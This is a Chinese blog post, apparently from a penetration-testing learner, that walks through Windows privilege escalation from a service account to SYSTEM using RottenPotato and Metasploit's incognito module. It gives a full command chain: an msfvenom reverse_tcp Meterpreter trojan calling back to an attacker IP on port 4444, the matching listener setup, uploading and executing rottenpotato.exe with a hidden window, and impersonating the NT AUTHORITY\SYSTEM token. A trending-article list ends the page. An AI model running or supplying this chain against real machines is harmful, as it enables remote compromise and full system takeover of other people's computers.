windows操作系统提权之服务提权实战rottenpotato

想拿 0day 的脚步小子2024-06-02 8:15

RottenPotato:
将服务帐户本地提权至SYSTEM
load incognito
list_tokens --u
upload /home/kali/Desktop rottenpotato.exe .
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\SYSTEM"
1.

load incognito

  • 这条命令用于加载 Metasploit 的 incognito 模块,该模块提供了一系列与 Windows 令牌操作相关的功能,比如令牌窃取、令牌操纵等。

list_tokens --u

  • list_token 命令用于列出当前会话中可用的访问令牌。-u 参数指定列出用户令牌,这些令牌代表系统中不同用户的访问权限。

upload /home/kali/Desktop rottenpotato.exe .

  • upload 命令用于将文件从攻击者的机器上传到目标机器。这里尝试上传 /root/rottenpotato.exe 文件到当前 Meterpreter 会话的工作目录。
  • 这条命令的意思是将位于 /home/kali/Desktop/ 目录下的 rottenpotato.exe 文件上传到 Meterpreter 会话的当前工作目录。如果当前工作目录是目标机器上的根目录,那么文件将被上传到那里

execute -Hc -f rottenpotato.exe

  • execute 命令用于在目标机器上执行一个程序。-Hc 参数指定隐藏控制台窗口,-f 参数指定执行指定的文件(这里是 rottenpotato.exe)。

impersonate_token "NT AUTHORITY\SYSTEM"

  • impersonate_token 命令用于模拟一个特定的访问令牌,从而获得该令牌的权限。这里指定模拟的是具有最高权限的系统令牌 NT AUTHORITY\SYSTEM

Meterpreter 会话输出中,list_tokens -u 命令被用来列出当前会话中可用的用户令牌。下面是输出结果的解释:

  1. Delegation Tokens Available:

    • 这部分列出了可用于委派的令牌。委派令牌允许一个服务代表另一个服务执行操作,通常用于服务之间的信任关系。
    • 在这个例子中,有一个用户令牌属于 GOD\Administrator,这意味着目标机器上的 Administrator 用户账户的令牌是可用的,并且可以被用来进行令牌窃取或模拟。

  2. Impersonation Tokens Available:

    • 这部分列出了可用于模拟的令牌。模拟令牌允许一个进程以另一个用户的身份执行操作。
    • 在这个例子中,显示 "No tokens available",这意味着当前没有可用的模拟令牌。

当你在渗透测试或安全评估中使用 Meterpreter 时,这些信息非常有用,因为它们可以帮助你确定可以利用哪些账户的权限来提升你的会话权限或执行特定的任务。

具体流程

1.生成木马并放到win7上

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.247.130 LPORT=4444 -f exe >test.exe

2.msfconsole进行监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.247.130

set LPORT 4444

exploit

3.加载 Metasploit 的 incognito 模块

load incognito

4.列出当前会话中可用的访问令牌

list_tokens --u

5.将烂土豆从攻击者的机器上传到目标机器

upload /home/kali/Desktop rottenpotato.exe .

6.查看目录烂土豆是否上传成功

7.将烂土豆执行

execute -Hc -f rottenpotato.exe

8. 模拟一个特定的访问令牌,从而获得该令牌的权限。这里指定模拟的是具有最高权限的系统令牌 NT AUTHORITY\SYSTEM

impersonate_token "NT AUTHORITY\SYSTEM"

9. 再次列出当前会话中可用的访问令牌

list_tokens --u

与第四步对比少了一句

-\] Warning: Not currently running as SYSTEM, not all tokens will be available Call rev2self if primary process token is SYSTEM 证明已经提权成功 ### 10.显示当前 Meterpreter 会话的运行用户(权限) getuid ![](https://img-blog.csdnimg.cn/direct/1bb0ac92897144e0ac0514e8c6d80101.png)

相关推荐
网络安全许木14 小时前
自学渗透测试第29天(Linux SUID/SGID基础实验)
linux·运维·服务器·web安全·渗透测试
合天网安实验室1 天前
记录一个免杀的php webshell demo
渗透测试·php·webshell·免杀
网络安全许木2 天前
自学渗透测试第28天(协议补漏与FTP抓包)
运维·服务器·网络安全·渗透测试·php
世界尽头与你3 天前
FastAPI Swagger Api 接口未授权访问漏洞
安全·网络安全·渗透测试·fastapi
能年玲奈喝榴莲牛奶3 天前
OfficeWeb365 SaveDraw 任意文件上传漏洞
安全·web安全·渗透测试·漏洞复现
网络安全许木3 天前
自学渗透测试第27天(基础补漏与工具的快捷键)
网络安全·渗透测试
锐速网络3 天前
渗透测试中如何验证漏洞真实存在
web安全·网络安全·渗透测试·漏洞复现·sql注入·文件上传漏洞·漏洞验证
锐速网络4 天前
云主机安全:漏洞扫描、渗透测试与加固指南
渗透测试·云安全·云原生安全·漏洞扫描·运维安全·云主机安全·云主机加固
网络安全许木5 天前
自学渗透测试第25天(工具链联动:nmap+whatweb+curl)
网络安全·渗透测试
zjeweler6 天前
万字长文解析:构建从域名发现到框架识别的信息收集
网络安全·渗透测试·信息收集
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档032026年4月AI大事件深度解读:大模型竞争进入“深水区“04近期有什么ai的新消息,新动态? 2026.4月05【AI】2026 年具身智能模型和世界模型总结062026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot07实测可用|小米 MiMo 百万亿 Token 免费领,开发者速冲08在Windows 11上安装Docker的踩坑记录09裂开!ChatGPT 居然开始要手机号验证,附详细解决方法10要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法